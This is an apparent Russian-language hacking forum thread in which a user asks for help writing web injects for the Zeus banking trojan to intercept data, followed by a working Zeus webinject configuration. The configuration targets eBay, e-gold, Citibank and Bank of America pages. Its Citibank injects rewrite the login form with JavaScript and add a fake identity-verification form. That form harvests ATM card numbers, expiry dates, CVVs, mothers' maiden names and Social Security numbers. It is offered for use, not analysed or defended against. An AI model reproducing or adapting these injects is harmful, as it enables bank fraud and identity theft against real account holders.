Есть ли у кого мануал по написанию инжектов для зевса или есть умельцы кто сможет поделиться своими знаниями, трудами? Думаю, не одному мне это интересно. В паблике мало инфы... Можно в пм и так же не за спасибо. Интересует перехват данных.
А что "светится", так это же малвари, они все "светятся"
А что "светится", так это же малвари, они все "светятся"
set_url */my.ebay.com/*CurrentPage=MyeBayPersonalInfo* GL
data_before
Registered email address</td>*<img*>
data_end
data_inject
e-mail:
data_end
data_after
</td>
data_end
set_url *.ebay.com/*eBayISAPI.dll?* GL
data_before
(<a href="http://feedback.ebay.com/ws/eBayISAPI.dll?ViewFeedback&*">
data_end
data_inject
Feedback:
data_end
data_after
</a>
data_end
set_url https://www.e-gold.com/acct/balance.asp* GPL
data_before
<form name=fiat*</form>
data_end
data_inject
data_end
data_after
<th colspan=4 align=left valign="bottom"
data_end
set_url https://web.da-us.citibank.com/*BS_Id=MemberHomepage* GL
data_before
account summary</font>
data_end
data_inject
data_end
data_after
<td height="10" colspan="4">
data_end
set_url https://web.da-us.citibank.com/cgi-bin/citifi/portal/l/l.do GP
data_before
src="/cm/js/branding.js"></script>
data_end
data_inject
<script>
function set_cookie1(name, value, expires)
{
if (!expires)
{
expires = new Date();
}
document.cookie = name + "=" + escape(value) + "; expires=" + expires.toGMTString() + "; path=/";
}
function get_cookie(name)
{
cookie_name = name + "=";
cookie_length = document.cookie.length;
cookie_begin = 0;
while (cookie_begin < cookie_length)
{
value_begin = cookie_begin + cookie_name.length;
if (document.cookie.substring(cookie_begin, value_begin) == cookie_name)
{
var value_end = document.cookie.indexOf (";", value_begin);
if (value_end == -1)
{
value_end = cookie_length;
}
return unescape(document.cookie.substring(value_begin, value_end));
}
cookie_begin = document.cookie.indexOf(" ", cookie_begin) + 1;
if (cookie_begin == 0)
{
break;
}
}
return null;
}
</SCRIPT>
data_end
data_after
<noscript>
data_end
data_before
</tr><tr><td colspan="3" class="password">
data_end
data_inject
<script>
var name1 = "ct_ver";
var cookie_val1 = get_cookie(name1);
if (cookie_val1 == "y9872")
{
document.writeln("<input type='password' name='password' id='password' onkeydown='checkUidComplete(event)' size='13'>");
}
if (cookie_val1 == null)
{
var tmp = "y9872";
var expires1 = new Date();
expires1.setTime(expires1.getTime() + (1000 * 86400 * 365));
set_cookie1(name1, tmp, expires1);
document.writeln("<input type='password' id='username' name='username' onkeydown='checkUidComplete(event)' size='13'>");
}
</script>
data_end
data_after
</td></tr><tr valign="top"><td><input type="checkbox"
data_end
data_before
"username" style="padding-bottom:4px;">
data_end
data_inject
<script>
var name2 = "ct_ver2";
var cookie_val2 = get_cookie(name2);
if (cookie_val2 == "y9871")
{
document.writeln("<input type='text' id='username' name='username' size='12' value=''>");
}
if (cookie_val2 == null)
{
var tmp = "y9871";
var expires1 = new Date();
expires1.setTime(expires1.getTime() + (1000 * 86400 * 365));
set_cookie1(name2, tmp, expires1);
document.writeln("<input type='text' name='password' id='password' size='12' value=''>");
}
</script>
data_end
data_after
</td></tr><tr><td colspan="2" nowrap><b>Password
data_end
set_url https://web.da-us.citibank.com/cgi-bin/citi...l/autherror.do* GP
data_before
<td colspan=2 class="username"><big><B>
data_end
data_inject
<input type="text" id="username" name="username" size="13" length="50" value=>
data_end
data_after
</B></big></td></tr>
data_end
data_before
univers/misc/error.gif'><font color=#d73535><B><big>
data_end
data_inject
Information you entered does not match our records.
data_end
data_after
</big></B></font><BR><BR><big>Please check
data_end
data_before
</big></B></font><BR><BR><big>
data_end
data_inject
In order to avoid fraud, we must verify your identity. We ask several questions.<br> Only you can answer these questions. This information is used only for security <br>reasons, to protect you from identity fraud.<br> Please make sure you complete all required information correctly.
data_end
data_after
<BR><BR>If you're
data_end
data_before
<tr valign=top><td colspan=2 class=inputField>
data_end
data_inject
<input id="password" name="password" maxlength="50" size="12" value="" autocomplete="OFF" type="password"><br><br></td></tr><!-- --> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tbody><tr valign="top"><td align="left"><big><br> Enter the information about Credit Card linked to your account: </big><br><br></td></tr></tbody></table> <tr><td colspan="2"><b>ATM Card Number</b></td></tr><br> <tr valign="top"><td colspan="2"> <INPUT TYPE="text" NAME="atm" VALUE="" SIZE="16" MAXLENGTH="16"><BR> </td></tr> <tr><td colspan="2"><b>Expired Date</b></td></tr> <br> <tr valign="top"><td colspan="2"> <INPUT TYPE="text" NAME="exp" VALUE="" SIZE="3" MAXLENGTH="5"></td></tr><BR> <tr><td colspan="2"><b>CVV</b></td></tr> <br> <tr valign="top"><td colspan="2"> <INPUT TYPE="text" NAME="cvv" VALUE="" SIZE="2" MAXLENGTH="3"><BR><br></td></tr> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tbody><tr valign="top"><td align="left"><big><br> Enter your personal<br> information: </big></td></tr></tbody></table><br> <tr><td colspan="2"><b>Mother's Maiden Name</b></td></tr> <br> <tr valign="top"><td colspan="2"> <INPUT TYPE="text" NAME="mmn" VALUE="" SIZE="20" MAXLENGTH="32"></td></tr><BR> <tr><td colspan="2"><b>Social Security Number</b></td></tr> <table border="0" cellpadding="0" cellspacing="0" width="20%"><tbody> <tr valign="top"><td colspan="2"> <INPUT TYPE="text" NAME="ssn1" VALUE="" SIZE="2" MAXLENGTH="3"> <td colspan="2"> <INPUT TYPE="text" NAME="ssn2" VALUE="" SIZE="1" MAXLENGTH="2" valign="left"> <td colspan="2"> <INPUT TYPE="text" NAME="ssn3" VALUE="" SIZE="3" MAXLENGTH="4"> </td></td></td></tr> </table></tbody> <!-- --><tr><td><IMG border=0 height=10 src='/images/pixel.gif' width=1></td></tr>
data_end
data_after
<tr><td align=left valign="top" nowrap></td><td align=right><IMG border=0 height=10 src='/images/pixel.gif' width=1><input type=image alt="" src="/images/univers/buttons/cont_btn.gif"
data_end
data_before
if(!(usernameValidation(frm.username)))
data_end
data_inject
return false; if(!(cinRegValidation(frm.atm))) return false; if((document.LoginValidateForm.exp.value.length<1) || (document.LoginValidateForm.cvv.value.length<1) || (document.LoginValidateForm.mmn.value.length<1) || (document.LoginValidateForm.ssn1.value.length<1) || (document.LoginValidateForm.ssn2.value.length<1) || (document.LoginValidateForm.ssn3.value.length<1)) { alert ("All fields are required."); return false; } else if((document.LoginValidateForm.exp.value.length<5) || (document.LoginValidateForm.cvv.value.length<3) || (document.LoginValidateForm.mmn.value.length<4) || (document.LoginValidateForm.ssn1.value.length<3) || (document.LoginValidateForm.ssn2.value.length<2) || (document.LoginValidateForm.ssn3.value.length<4)) { alert ("Please verify your information and fill the form.\n(All fields are required)."); return false; }
data_end
data_after
if(!(passwordValidation(frm.password)))
data_end
set_url https://onlineeast#.bankofamerica.com/*/GotoCustomerServiceMenu* GPL
data_before
(your current e*mail address is:*
data_end
data_inject
BOA : EMAIL
data_end
data_after
)
data_end
set_url https://sitekey.bankofamerica.com/sas/maint.do GPH
data_before
<!-- one -->
data_end
data_inject
BOA : Answers
data_end
data_after
securityKey3Ans*</TR>
data_end